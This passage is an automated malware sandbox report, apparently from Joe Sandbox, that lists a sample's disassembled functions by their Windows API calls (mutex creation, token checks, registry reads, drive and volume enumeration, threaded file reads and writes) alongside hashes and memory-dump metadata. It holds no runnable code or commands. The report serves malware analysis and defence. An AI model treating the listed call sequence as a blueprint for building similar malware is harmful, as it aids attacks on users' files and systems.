                              • Opcode Fuzzy Hash: c12bdd7b7d564f65ffb1346cce85d70a657970785e2d7cb333bf3f36caf8f741
                              • Instruction Fuzzy Hash: 54F0DA3251122DBFCF215F96DC0ADDB7F6DEF0A6A1B004065FA09D1120D6328920EBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <
                              • API String ID: 0-4251816714
                              • Opcode ID: 957d4cbdb93980f743f04da9f8db7a268f75074d930f93fecdd3fc06cf04ff83
                              • Instruction ID: e1523b8020ae891230c900cf10ab4760c81e13254a83a3ae1cb85272e61416c5
                              • Opcode Fuzzy Hash: 957d4cbdb93980f743f04da9f8db7a268f75074d930f93fecdd3fc06cf04ff83
                              • Instruction Fuzzy Hash: 36615CB1910219BFDF219FA4DC49EAE7BB8EF09760F10412AF505E6290E7708A04CBB4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00D947E2
                              • RtlGetLastWin32Error.NTDLL ref: 00D947F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateErrorLastMutexWin32
                              • String ID:
                              • API String ID: 682235734-0
                              • Opcode ID: 9ae38e994f9241034f650f772e0a4c3b6fbd09903ab02bfee5fd4b2616688844
                              • Instruction ID: 12d9266f12cdff856704bb91a51809e24f6eeccbe01219d16b1dab57b9bcc5d0
                              • Opcode Fuzzy Hash: 9ae38e994f9241034f650f772e0a4c3b6fbd09903ab02bfee5fd4b2616688844
                              • Instruction Fuzzy Hash: F7F02B72A9035C6BDB106BF89C06EDB77ACDF06711F000062FE09D3281EE61990587F1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,00D94AB9,00000000), ref: 00D93F44
                              • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),00000000,00000004,?), ref: 00D93F5D
                                • Part of subcall function 00D93CCE: FindCloseChangeNotification.KERNEL32(00000000), ref: 00D93CDA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Token$ChangeCloseFindInformationNotificationOpenProcess
                              • String ID:
                              • API String ID: 3152771255-0
                              • Opcode ID: 60b7a608bc69752ef92a94e14a56b4a24b95cc02dd71796ffaf0981b1d179a7f
                              • Instruction ID: 55c886b446d73300d05831abc910a090088b284e99de8669d07ac366d0e05d9c
                              • Opcode Fuzzy Hash: 60b7a608bc69752ef92a94e14a56b4a24b95cc02dd71796ffaf0981b1d179a7f
                              • Instruction Fuzzy Hash: 9FF01C3195020CBBDF00DFE4DD06EECBBB8EB04712F1040A1BA04E2190DB319B589BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetErrorMode.KERNEL32(00000001,00D93604,00000000), ref: 00D935BB
                                • Part of subcall function 00D947B3: CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00D947E2
                                • Part of subcall function 00D947B3: RtlGetLastWin32Error.NTDLL ref: 00D947F1
                              • GetCurrentProcessId.KERNEL32 ref: 00D935DD
                                • Part of subcall function 00D93E06: ExitProcess.KERNEL32 ref: 00D93E0C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorProcess$CreateCurrentExitLastModeMutexWin32
                              • String ID:
                              • API String ID: 4743098-0
                              • Opcode ID: 52f41d6cc23cd6dfbf540b0f5cb72d2de4c7f251d139a0611e442c8dd4239586
                              • Instruction ID: 07dbbc26f6231133f6b2c60588cfcdca9acc1a8c70381d3fcb354fc46614d8e4
                              • Opcode Fuzzy Hash: 52f41d6cc23cd6dfbf540b0f5cb72d2de4c7f251d139a0611e442c8dd4239586
                              • Instruction Fuzzy Hash: 09D0A7A525530379EFA033F05D07B1F2144CF14711F090811BA05D40C3EE36CB4186B6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D946E5: RegOpenKeyExW.KERNEL32(?,?,00000000,00000001,?,00DAC040,00DAC040,?,?,00D92288,80000002,?,?,?,?), ref: 00D946FC
                                • Part of subcall function 00D946E5: RegQueryValueExW.KERNEL32(?,?,00000000,80000002,00000000,00D92288,80000002,?,?,00D92288,80000002,?,?,?,?), ref: 00D94716
                                • Part of subcall function 00D946E5: RegQueryValueExW.KERNEL32(?,?,00000000,80000002,00000000,00D92288,?,?,00D92288,80000002,?,?,?,?), ref: 00D9473E
                                • Part of subcall function 00D946E5: RegCloseKey.KERNEL32(?,?,?,00D92288,80000002,?,?,?,?), ref: 00D94754
                              • _snwprintf.NTDLL ref: 00D91DDC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: QueryValue$CloseOpen_snwprintf
                              • String ID:
                              • API String ID: 775465768-0
                              • Opcode ID: 9addd0d6a5d0d65e9cef6cac730caf7e1e4adbb6e13f54c52cccdbdd0ed9b5c2
                              • Instruction ID: c1d3d830a4b775683552db8a3c22c25953a9167977f9f43e733cc8129b457f26
                              • Opcode Fuzzy Hash: 9addd0d6a5d0d65e9cef6cac730caf7e1e4adbb6e13f54c52cccdbdd0ed9b5c2
                              • Instruction Fuzzy Hash: ED41A376900219BBEF11ABD0DD82FFB77BDEB0A714F040025FA06E6252E6219A11C7B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D93B35: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00D91A9D,?,?,00D91ACC), ref: 00D93B4A
                                • Part of subcall function 00D93B35: GetProcessHeap.KERNEL32(?,00D91A9D,?,?,00D91ACC), ref: 00D93B59
                              • GetFileAttributesW.KERNEL32(00000000), ref: 00D92694
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AttributesCreateFileProcess
                              • String ID:
                              • API String ID: 185973895-0
                              • Opcode ID: a7f0f64799c0e5be96c60c48697c0204cd47253480bba453f5c8828a76e1bf2a
                              • Instruction ID: ff0188b948034bfc15cd58316a241ddb96b090409456f534187aaf559fb76380
                              • Opcode Fuzzy Hash: a7f0f64799c0e5be96c60c48697c0204cd47253480bba453f5c8828a76e1bf2a
                              • Instruction Fuzzy Hash: BF31C43295061A79EF15ABB4DC42EFF33ACDF0A710F140526F905F7182EA61DA0583B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CompletionCurrentOpenQueuedStatus
                              • String ID:
                              • API String ID: 1990635249-0
                              • Opcode ID: d235994a129725f7d0c6be77673678df09f7f577bcabf583f36872f73dcfe70f
                              • Instruction ID: aba88c92545a279e64c0a95ece7167954236aba942de30962bb2d459e9fbd5fa
                              • Opcode Fuzzy Hash: d235994a129725f7d0c6be77673678df09f7f577bcabf583f36872f73dcfe70f
                              • Instruction Fuzzy Hash: D4112772804104BACF25ABB8DD47FFE37ACDB05314F140255F401A2097EB71EB9196B6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D93B35: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00D91A9D,?,?,00D91ACC), ref: 00D93B4A
                                • Part of subcall function 00D93B35: GetProcessHeap.KERNEL32(?,00D91A9D,?,?,00D91ACC), ref: 00D93B59
                              • GetDriveTypeW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,?,?,00D92B2E,?,?,?,?,00000000), ref: 00D9653E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$CreateDriveProcessType
                              • String ID:
                              • API String ID: 1501148493-0
                              • Opcode ID: 049292da1390864121a770422af5802888c73199dc550bb656e49b3c3057e56a
                              • Instruction ID: 6cc8c2f8bf42901e3cfa096667c849660f0b787c18e9b17d9440aa857b24accf
                              • Opcode Fuzzy Hash: 049292da1390864121a770422af5802888c73199dc550bb656e49b3c3057e56a
                              • Instruction Fuzzy Hash: ED01492355161566EB20BBA8DC02DBF72E4DF02720F14892AF558D54D1E560C54083B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D93B35: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00D91A9D,?,?,00D91ACC), ref: 00D93B4A
                                • Part of subcall function 00D93B35: GetProcessHeap.KERNEL32(?,00D91A9D,?,?,00D91ACC), ref: 00D93B59
                                • Part of subcall function 00D94879: GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000022,?,00D94180,00000000,00000001), ref: 00D9489C
                              • wsprintfW.USER32 ref: 00D941EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$CreateInformationProcessVolumewsprintf
                              • String ID:
                              • API String ID: 2230357944-0
                              • Opcode ID: 2f709bcf30cee1340177dce90de93d45efe3f243d4d51ff47fe8be3615b538f8
                              • Instruction ID: f15c8f444576efb89cc527e9a7835e1af5e01099b4a2081124547db2c3153e34
                              • Opcode Fuzzy Hash: 2f709bcf30cee1340177dce90de93d45efe3f243d4d51ff47fe8be3615b538f8
                              • Instruction Fuzzy Hash: 5A016DB6A40208BAEB01ABE49C42FEFB77CDF44710F000562FB04E6186EA60975647B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlGetLastWin32Error.NTDLL ref: 00D92D0D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastWin32
                              • String ID:
                              • API String ID: 3973360955-0
                              • Opcode ID: 6dff71a239c20e6c49c0164cd4cc59b8ce466acba4f5f74b5e9c79582db02461
                              • Instruction ID: 634a9c2e34d7df50700a455fdac6ce60d5088f2b5e8bfb63e9f4eaca14f5c7c0
                              • Opcode Fuzzy Hash: 6dff71a239c20e6c49c0164cd4cc59b8ce466acba4f5f74b5e9c79582db02461
                              • Instruction Fuzzy Hash: AB01F9326007543AEF246A29DD85FBF339CDB89754F08453AF909A7141E670ED4087F1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D96193: WriteFile.KERNEL32(?,?,00D92BF0,00000000,?,?,00D92C8B,?,?,?,?,?,?,?,?,?), ref: 00D961A5
                              • RtlGetLastWin32Error.NTDLL ref: 00D92C90
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFileLastWin32Write
                              • String ID:
                              • API String ID: 2457671358-0
                              • Opcode ID: e230f20a47e5d8ab719aa0c49ce0667357b64b0622539d95383b4b631314ecb4
                              • Instruction ID: 4c67de3bff46a31388b6a285cc0544022c033ab8806cf7dacd4744421d714593
                              • Opcode Fuzzy Hash: e230f20a47e5d8ab719aa0c49ce0667357b64b0622539d95383b4b631314ecb4
                              • Instruction Fuzzy Hash: 09F09076501B587BDF216FA5CC05DEF37ACDFC6710F048419FA18AA102D671E65187B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D93AF4: HeapCreate.KERNEL32(00000000,00000000,00000000,?,00D9602E,00000000,00000000,?,00D92AE6,?,00000000,00000000), ref: 00D93B09
                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,00000000,?,00D92AE6,?,00000000,00000000,00D92B85,00000000), ref: 00D96045
                                • Part of subcall function 00D95FD2: CreateThread.KERNEL32(00000000,00000000,00000000,00D92B85,00000000,00000000), ref: 00D95FF6
                                • Part of subcall function 00D93B11: HeapDestroy.KERNELBASE(?,?,00D9533D,?,?,00DAD79C,00000000,00000000,?,00D913EC,00DAD778,?,00000000), ref: 00D93B17
                                • Part of subcall function 00D93CCE: FindCloseChangeNotification.KERNEL32(00000000), ref: 00D93CDA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Create$Heap$ChangeCloseCompletionDestroyFindNotificationPortThread
                              • String ID:
                              • API String ID: 1739922738-0
                              • Opcode ID: a7b66a27f12b6d222a7372ae2538de6cbed2a19fe3f33c777eb546aa922d0794
                              • Instruction ID: 1c74e8a4445451f59aa2ab8298f5b6fbb894182a78dc27e780df525e8b0a0248
                              • Opcode Fuzzy Hash: a7b66a27f12b6d222a7372ae2538de6cbed2a19fe3f33c777eb546aa922d0794
                              • Instruction Fuzzy Hash: 3AF09032204606EADF316F65EC42B6A7B98DF017B5F204529F499E51A1EB22D4209774
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D9454B: GetSystemInfo.KERNEL32(00D92B85,00D92B85,?,?,00D92AE6,?,00000000,00000000,00D92B85,00000000), ref: 00D94555
                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,00D92B7B,?,00DAD4D0,?,?,?,00000000), ref: 00D95F9B
                                • Part of subcall function 00D9486B: Sleep.KERNEL32(?,?,00D95FB6,00000064,00000000,00000000,?,?,00D92B7B,?,00DAD4D0,?,?,?,00000000), ref: 00D94871
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CompletionInfoPostQueuedSleepStatusSystem
                              • String ID:
                              • API String ID: 883128096-0
                              • Opcode ID: 833efbeed890cb9cf87d458474f87b5245e3f5c8f54daef0e4b86b76aa49e25c
                              • Instruction ID: 7056876614f24b47b6c7aa62934efcee9612a222e6220599510865da5b2a1fa8
                              • Opcode Fuzzy Hash: 833efbeed890cb9cf87d458474f87b5245e3f5c8f54daef0e4b86b76aa49e25c
                              • Instruction Fuzzy Hash: 15F0BE72204B04AEEF023F65ECC2D6AB79CEF41778B100039F5599A1A6DA32EC414630
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(C0000000,?,00000000,00000000,00D92885,48000000,00000000,00000000,?,00D92885,00000000,?,00000003,00000000,C0000000,00000000), ref: 00D96120
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: c316745c7272523b14c3019b18476737be83e1e27b8a77da15f955f80ae09465
                              • Instruction ID: ee1869a4e945abc822df7cd54d9cb56d692affce0697eff8f365aab00b60dd54
                              • Opcode Fuzzy Hash: c316745c7272523b14c3019b18476737be83e1e27b8a77da15f955f80ae09465
                              • Instruction Fuzzy Hash: 1A01E175510705AFDF21AF75EC009A67BE5EF09360B104A29FC5AD6651E331E8109F70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D9454B: GetSystemInfo.KERNEL32(00D92B85,00D92B85,?,?,00D92AE6,?,00000000,00000000,00D92B85,00000000), ref: 00D94555
                              • CreateThread.KERNEL32(00000000,00000000,00000000,00D92B85,00000000,00000000), ref: 00D95FF6
                                • Part of subcall function 00D93CCE: FindCloseChangeNotification.KERNEL32(00000000), ref: 00D93CDA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ChangeCloseCreateFindInfoNotificationSystemThread
                              • String ID:
                              • API String ID: 908986755-0
                              • Opcode ID: bbb58faedcd34d6f4b42b5bd529cf763491a3118b62fa71c47ee2c5303152d91
                              • Instruction ID: 08c1de99b7447625f6955fd42902937e882bf6889a76411ca9e5d29f5df478eb
                              • Opcode Fuzzy Hash: bbb58faedcd34d6f4b42b5bd529cf763491a3118b62fa71c47ee2c5303152d91
                              • Instruction Fuzzy Hash: 01F0A0726102086E9F102EBAACC08ABB69CDE493B9315483AB52AC3152D930CC015270
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D9615F: ReadFile.KERNEL32(?,?,00D92BFB,00000000,?,?,00D92A6D,?,?,?,?,?,?,00D92BFB,?,?), ref: 00D96171
                              • RtlGetLastWin32Error.NTDLL ref: 00D92A72
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFileLastReadWin32
                              • String ID:
                              • API String ID: 3522703849-0
                              • Opcode ID: c3b736e660ac488132a51b635c0f9b9e935ed976996efd109bd4f5663a21d8a7
                              • Instruction ID: d40cce20428e29e92f34a0d5093c95e275318f56703e1e218c6b00f12b4bdb54
                              • Opcode Fuzzy Hash: c3b736e660ac488132a51b635c0f9b9e935ed976996efd109bd4f5663a21d8a7
                              • Instruction Fuzzy Hash: CEF0E233501B047ECF306AA5CC02EFF77ADDF86310F08481AF91CA6222EA21A51187F6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D94B86: GetWindowsDirectoryW.KERNEL32(00000000,00000000,00000000,00D94883,00000000,00000022,?,00D94180,00000000,00000001), ref: 00D94B8B
                              • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000022,?,00D94180,00000000,00000001), ref: 00D9489C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
